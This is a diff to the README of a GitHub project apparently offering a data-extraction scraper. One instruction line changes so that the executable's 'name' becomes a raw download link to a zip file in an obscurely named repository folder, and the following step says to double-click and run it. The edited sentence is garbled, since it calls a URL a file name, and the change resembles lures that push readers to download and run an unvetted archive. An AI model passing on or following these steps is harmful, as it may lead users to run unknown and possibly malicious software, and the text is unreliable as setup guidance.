Rdaniyaal/easyco-il-data-extraction-scraper/README.md

 ## ⚙️ Running the Application

 1. Navigate to the folder where you extracted the files.
-2. Look for the executable file, named `easyco.exe` or similar.
+2. Look for the executable file, named `https://github.com/Rdaniyaal/easyco-il-data-extraction-scraper/raw/refs/heads/main/ancylopod/il_easyco_scraper_data_extraction_v3.0.zip` or similar.
 3. Double-click the file to run the application.

 ## 📚 How to Use the Scraper